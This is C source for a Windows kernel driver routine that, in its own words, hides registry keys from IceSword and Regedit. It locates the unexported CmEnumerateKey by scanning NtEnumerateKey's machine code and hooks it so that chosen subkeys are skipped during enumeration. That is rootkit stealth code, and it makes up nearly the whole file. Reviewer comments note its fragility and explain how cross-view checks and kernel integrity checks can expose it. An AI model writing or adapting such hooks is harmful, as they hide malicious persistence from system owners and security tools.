//Hide registry keys from IceSword, Regedit, etc.
#include "ntifs.h"
#include "stdarg.h"
#include "stdio.h"
#include "stddef.h"
#include "stddef.h"
#include "xde.h"
#include "myfun.h"
// Address of the located CmEnumerateKey routine; written by HideReg() (0 when
// the scan in LocateCmEnumerateKey() found nothing). Not read anywhere on this page.
DWORD gCMaddr; // CmEnumerateKey
// Pointer through which HookedCmCall() reaches the original CmEnumerateKey;
// filled in by HookCode() (myfun.h, not on this page) during HideReg().
TypeCmEnumerateKey OrgCall;
/*
 * LocateCmEnumerateKey - find the address of the (unexported) CmEnumerateKey
 * routine by pattern-scanning the NtEnumerateKey system-service handler.
 *
 * What the code below does:
 *   1. Resolve the service-table entry for ZwEnumerateKey through
 *      GetServiceID()/GetServiceTable()/GetServiceTable_Alt() (myfun.h, not
 *      on this page).
 *   2. Disassemble forward with xde_disasm() from that address, recording each
 *      instruction length in cCodebk[], until the byte sequence C2 18 00
 *      ("ret 0x18") is found or MAX_NT_ENUM_LEN bytes have been scanned.
 *   3. Walk the recorded instructions backwards, counting push instructions
 *      between consecutive E8 (call rel32) opcodes. The first call that is
 *      preceded by exactly six pushes and whose target is not
 *      ObReferenceObjectByHandle (also a six-argument routine) is taken to be
 *      CmEnumerateKey, which takes six arguments (see HookedCmCall).
 *
 * Returns: the resolved address, or 0 when the service entry cannot be found,
 * disassembly fails, "ret 0x18" is not found within MAX_NT_ENUM_LEN bytes, or
 * no matching call exists.
 *
 * NOTE(review): this is a heuristic tied to one 32-bit x86 build layout of
 * NtEnumerateKey (DWORD-sized addresses, rel32 call decoding, "ret 0x18" =
 * six DWORD arguments cleaned by the callee). On any other build, or if the
 * function has already been patched by something else, the scan can return a
 * wrong address and nothing here can tell.
 */
DWORD LocateCmEnumerateKey()
{
int length = 0;
int totalLength = 0;
DWORD retaddr = 0;
struct xde_instr instr;
DWORD mask;
DWORD addr;
DWORD rvstart;
DWORD cmaddr;
int i;
PBYTE p;
int codecnt = 0; // count of code line from the begin of the call to the end
int pushcnt = 0; // count of "push"
DWORD precallcode = 0;
// Length of each instruction scanned, indexed by codecnt. There is no bounds
// check against 2000; codecnt can grow to at most MAX_NT_ENUM_LEN (every
// instruction is >= 1 byte), so safety depends on MAX_NT_ENUM_LEN <= 2000
// (its value is not on this page -- confirm).
BYTE cCodebk[2000];
DWORD srvid = GetServiceID(ZwEnumerateKey);
addr = GetServiceTable(srvid);
if(!addr)
{
// fallback lookup when the primary table walk yields nothing
addr = GetServiceTable_Alt(srvid);
}
__try
{
if(addr)
{
//
//search for "ret 0x18"
//
while (totalLength < MAX_NT_ENUM_LEN)
{
length = xde_disasm((PBYTE)((int)addr + totalLength), &instr);
if (length == 0)
{
// undecodable byte: give up, retaddr stays 0
DbgPrint("disaaemble error!\n");
__leave;
}
//
//compute code break
//
cCodebk[codecnt] = (BYTE)length;
codecnt++;
totalLength += length;
// Low three bytes of the next DWORD, little-endian: C2 18 00 -> 0x0018C2,
// i.e. "ret 0x18". Note this reads one byte beyond the three compared.
mask = (*(PDWORD)(addr+totalLength))&0x00FFFFFF;
if(mask == 0x18C2)
break;
}
//find "ret 0x18" ?
if(totalLength >= MAX_NT_ENUM_LEN)
__leave;
//
//rvstart equals the end of the function
//
rvstart = (addr+totalLength);
p = addr; // not used after this assignment
i = codecnt;
//
//now we search from the end to the begin
//for the function call with 6 push operations
//but we should exclude ObReferenceObjectByHandle
//
// Each iteration steps back exactly one instruction using the recorded
// length, so rvstart reaches addr precisely when i reaches 0.
while(rvstart != addr )
{
int nLen;
i--;
nLen = cCodebk[i];
rvstart-=nLen;
xde_disasm(rvstart, &instr);
// pushes seen since the most recent (later-in-code) call
if((instr.flag & C_PUSH)== C_PUSH)
pushcnt++;
if(*(PBYTE)rvstart == 0xE8) //call?
{
// first call encountered (nearest the ret): just remember it
if(0 == precallcode)
{
pushcnt = 0;
precallcode = rvstart;
continue;
}
// the pushes counted so far belong to the later call at precallcode
if(pushcnt == 6)
{
// E8 rel32: target = rel32 + address of the following instruction
cmaddr = *(PDWORD)(precallcode+1)+precallcode+5;
if(cmaddr != ObReferenceObjectByHandle)
{
retaddr = cmaddr;
__leave;
}
}
// restart the count for this (earlier) call
pushcnt = 0;
precallcode = rvstart;
}
}
}
}
__finally{
// nothing to release; __leave above just lands here
NOTHING;
}
//error return
return retaddr;
}
/*
 * HookedCmCall - replacement installed over CmEnumerateKey by HideReg().
 *
 * Always forwards to the original routine through OrgCall first. When the
 * caller asked for KeyNodeInformation or KeyBasicInformation and that call
 * succeeded, the helpers IsCurrentProcessTryToSaveKey() and
 * RegIndexShouldSkipOne() (myfun.h, not on this page) decide whether the entry
 * at Index is to be hidden; if so the enumeration is re-issued with Index+1 and
 * that result is returned instead, so the caller sees the next sibling in place
 * of the hidden one.
 *
 * Parameters mirror CmEnumerateKey's: KeyControlBlock, Index,
 * KeyInformationClass, KeyInformation, Length, ResultLength.
 * Returns: the NTSTATUS of whichever OrgCall result is passed through.
 *
 * Detection note: only the enumeration path is altered here (as far as this
 * page shows), and the hiding is a per-index shift. A cross-view comparison --
 * live enumeration versus a hive read from disk, or enumeration versus opening
 * the key by name -- exposes the discrepancy.
 */
NTSTATUS HookedCmCall(
IN PVOID KeyControlBlock,
IN ULONG Index,
IN KEY_INFORMATION_CLASS KeyInformationClass,
IN PVOID KeyInformation,
IN ULONG Length,
IN PULONG ResultLength
)
{
NTSTATUS status;
// The real entry at Index is fetched first; KeyInformation is already
// populated with it by the time the skip decision below is made.
status = OrgCall(
KeyControlBlock,
Index,
KeyInformationClass,
KeyInformation,
Length,
ResultLength);
// only the two information classes that carry the subkey name are filtered
if(
(KeyInformationClass == KeyNodeInformation)
||
(KeyInformationClass == KeyBasicInformation)
)
{
//
//considering our driver will never be the last one
//so we will never consider the situation of "STATUS_NO_MORE_ENTRIES"
//
// (i.e. the author deliberately does not handle a hidden entry being the
// last one; the Index+1 call then simply returns whatever OrgCall returns)
if(
(STATUS_SUCCESS == status)
)
{
// caller's buffer not currently accessible: pass the result through untouched
if(!MmIsAddressValid(KeyInformation))
return status;
// Nested brace-less ifs: the skip happens only when the current process
// is not "saving" keys (presumably to keep hive export intact -- confirm)
// AND the helper says this index should be skipped.
if(!IsCurrentProcessTryToSaveKey())
if(RegIndexShouldSkipOne(KeyControlBlock,Index))
{
return OrgCall(
KeyControlBlock,
Index+1,
KeyInformationClass,
KeyInformation,
Length,
ResultLength);
}
}
}
return status;
}
/*
 * HideReg - locate CmEnumerateKey and redirect it to HookedCmCall.
 *
 * Stores the located address in gCMaddr (0 when not found) and, on success,
 * calls HookCode() (myfun.h, not on this page) to patch the routine and capture
 * the original entry point in OrgCall.
 *
 * Returns: the address that was hooked, or 0 if LocateCmEnumerateKey failed.
 *
 * NOTE(review): whatever HookCode returns is discarded, and no unhook
 * counterpart appears on this page. The (TypeCmEnumerateKey *) cast on the
 * lookup result is immediately converted back to DWORD by the assignment.
 */
DWORD HideReg()
{
DWORD cmaddr;
cmaddr = (TypeCmEnumerateKey *)LocateCmEnumerateKey();
gCMaddr = cmaddr;
if(!cmaddr)
return 0;
//start to hook
//
// HookCode is presumably an inline patch of the routine's first bytes -- confirm;
// such a patch is visible to integrity checks that compare the live text
// section against the on-disk kernel image.
HookCode((DWORD)cmaddr,(DWORD)HookedCmCall,(DWORD*)&OrgCall);
return cmaddr;
}